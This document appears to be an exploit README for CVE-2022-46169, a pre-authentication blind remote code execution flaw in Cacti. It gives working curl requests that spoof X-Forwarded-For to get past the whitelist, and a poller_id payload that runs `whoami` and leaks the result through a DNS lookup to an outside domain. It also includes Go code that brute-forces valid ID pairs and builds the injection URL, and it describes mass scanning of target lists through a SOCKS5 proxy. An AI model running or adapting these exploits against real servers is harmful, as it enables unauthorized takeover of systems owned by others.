## https://sploitus.com/exploit?id=22AF6966-7EAC-508E-AE8A-9444BFC5F2FC
# CVE-2022-46169

Cacti Blind Remote Code Execution (Pre-Auth)

## Disclaimer

This is for educational purposes only. I am not responsible for your actions. Use at your own discretion.

## Explanation

This script brute-forces the values required to exploit this vulnerability. Three things are needed before a command can be injected:

- Whitelisted IP address
- Correct `host_id` parameter
- Correct `local_data_ids` parameter

The file `remote_agent.php` is protected by an IP whitelist. Cacti derives the client address from proxy headers, so you can bypass the check by spoofing your address in the `X-Forwarded-For` header. Most instances will have `127.0.0.1` or the server's own IP address whitelisted.

Next you need to brute-force the `host_id` and `local_data_ids[]` request parameters: the pair has to name an existing poller item (a device and one of its data sources) or the vulnerable code path is never reached. The script does this by enumerating pairs of integers `x,y`, by default from a minimum of 1 to a maximum of 10.

Example request for `host_id=1`, `local_data_ids[]=2`. Pass `-g` so curl does not treat the `[]` in the URL as a glob range. An empty JSON array (`[]`) means the spoofed address was accepted but the pair does not exist; a non-empty array means the pair matches a real poller item.

```sh
pair_x="1"
pair_y="2"
curl -k -g -H "X-Forwarded-For: 127.0.0.1" \
    "https://target.com/cacti/remote_agent.php?action=polldata&poller_id=1&host_id=$pair_x&local_data_ids[]=$pair_y"

[]
```

## Exploitation

Once you have all three values, inject a shell command into the `poller_id` parameter. Start the value with `;` so that the command Cacti builds is terminated and your command runs after it. Only poller items whose action type is `POLLER_ACTION_SCRIPT_PHP` (script server) reach the vulnerable `proc_open()` call, so a pair that returns data is not guaranteed to be injectable.

This is blind RCE: nothing your command prints comes back in the response, so send its output somewhere you control, such as an interactsh callback, or open a reverse shell. Remember to URL-encode the `poller_id` value.

The following executes the command `ping $(whoami).test.com` (`;` is encoded as `%3B`, `$(` as `%24%28` and `)` as `%29`):

```sh
curl -k -g -H "X-Forwarded-For: 127.0.0.1" \
    "https://target.com/cacti/remote_agent.php?action=polldata&host_id=1&local_data_ids[]=3&poller_id=%3Bping%20%24%28whoami%29.test.com"
```
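To tie the enumeration and injection steps together, here is an added Go example. It is not the README's `bruteforce.go` and not Cacti code: it builds the `polldata` request for one guess, classifies the response the way the README describes (`[]` means the whitelist was bypassed but no such pair exists, a non-empty array means a hit), walks the `[min,max]` pair space with a spoofed `X-Forwarded-For`, and then reuses the same URL builder to percent-encode the `poller_id` payload. The HTTP stub it talks to is constructed for the example so it runs offline; its whitelisted address, its single known pair and its refusal text are assumptions, not Cacti's real responses.

```go
package main

import (
	"encoding/json"
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"net/url"
	"strconv"
	"strings"
)

// Pair is a host_id / local_data_id guess that remote_agent.php answered
// with a non-empty poll result, i.e. it names a real poller item.
type Pair struct{ HostID, DataID int }

// BuildPollURL assembles one polldata request. url.Values percent-encodes
// the brackets of local_data_ids[] and whatever poller_id carries, so a
// command payload needs no manual encoding.
func BuildPollURL(base string, hostID, dataID int, pollerID string) string {
	q := url.Values{}
	q.Set("action", "polldata")
	q.Set("poller_id", pollerID)
	q.Set("host_id", strconv.Itoa(hostID))
	q.Set("local_data_ids[]", strconv.Itoa(dataID))
	return strings.TrimRight(base, "/") + "/remote_agent.php?" + q.Encode()
}

// Classify reads a polldata body. A JSON array means the spoofed
// X-Forwarded-For got past the whitelist; a non-empty one means the
// host_id/local_data_id pair exists. Anything that is not a JSON array
// (a plain-text refusal, an error page) counts as blocked.
func Classify(body []byte) (bypassed, hit bool) {
	var items []json.RawMessage
	if err := json.Unmarshal(body, &items); err != nil {
		return false, false
	}
	return true, len(items) > 0
}

// Bruteforce tries every host_id/local_data_id pair in [min,max]^2 with the
// spoofed client address. It stops as soon as the whitelist rejects the
// address, because no pair can succeed after that.
func Bruteforce(c *http.Client, base, spoofIP string, min, max int) ([]Pair, bool, error) {
	if min > max {
		return nil, false, fmt.Errorf("empty range %d..%d", min, max)
	}
	var hits []Pair
	for h := min; h <= max; h++ {
		for d := min; d <= max; d++ {
			req, err := http.NewRequest(http.MethodGet, BuildPollURL(base, h, d, "1"), nil)
			if err != nil {
				return nil, false, err
			}
			req.Header.Set("X-Forwarded-For", spoofIP)
			resp, err := c.Do(req)
			if err != nil {
				return nil, false, err
			}
			body, err := io.ReadAll(resp.Body)
			resp.Body.Close()
			if err != nil {
				return nil, false, err
			}
			bypassed, hit := Classify(body)
			if !bypassed {
				return nil, false, nil
			}
			if hit {
				hits = append(hits, Pair{h, d})
			}
		}
	}
	return hits, true, nil
}

// NewStub is a constructed stand-in for remote_agent.php so the example runs
// offline: it honours one whitelisted address and knows one poller item. Its
// responses mimic the shapes the README describes, not Cacti's own code.
func NewStub(allowedIP string, hostID, dataID int) *httptest.Server {
	return httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if r.Header.Get("X-Forwarded-For") != allowedIP {
			fmt.Fprint(w, "FATAL: You are not authorized to use this service")
			return
		}
		q := r.URL.Query()
		if q.Get("host_id") == strconv.Itoa(hostID) && q.Get("local_data_ids[]") == strconv.Itoa(dataID) {
			fmt.Fprintf(w, `[{"local_data_id":%d,"rrd_name":"traffic_in","value":"42"}]`, dataID)
			return
		}
		fmt.Fprint(w, "[]")
	}))
}

func main() {
	srv := NewStub("127.0.0.1", 1, 3)
	defer srv.Close()

	hits, bypassed, err := Bruteforce(srv.Client(), srv.URL, "127.0.0.1", 1, 5)
	if err != nil {
		panic(err)
	}
	fmt.Println("bypassed:", bypassed, "hits:", hits)

	// With a valid pair, poller_id becomes the injection point: the leading
	// ';' ends the command Cacti builds and the rest runs after it.
	for _, p := range hits {
		fmt.Println(BuildPollURL(srv.URL, p.HostID, p.DataID, ";ping $(whoami).test.com"))
	}
}
```

Run it with `go run .`: it reports the bypass, the single hit `{1 3}`, and the fully encoded injection URL. Against a real target you would replace `NewStub` with the Cacti base URL and keep the rest; the early return in `Bruteforce` is what lets a scanner skip the whole ID range on hosts where the spoofed address is not whitelisted.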

## Output

The script outputs CSV with the header `"target", "ip", "host_id", "data_id", "url"`.

If the `url` value is empty, the script bypassed the IP restriction on that target but did not find a valid ID pair within the range. Take those targets and run again with a higher `-max`.

## Parsing Output

You can use the following commands to quickly parse the output file

### Targets with IP restriction bypassed

```sh
tail -n +2 results.csv | cut -d ',' -f1 | sort -u
```

### Exploitable Targets

Rows without a `url` value are skipped so the empty field does not show up as a blank line:

```sh
tail -n +2 results.csv | cut -d ',' -f5 | grep -v '^$' | sort -u
```

## Build

```sh
go build -v -o bruteforce bruteforce.go
```

## Usage

```sh
./bruteforce -l targets.txt -t 50 -min 1 -max 10
```

- **Targets must be a list of IP addresses, one per line; the port may be omitted**
- A SOCKS5 proxy is supported: `-proxy socks5://127.0.0.1:9050`
- The default output file is `results.csv`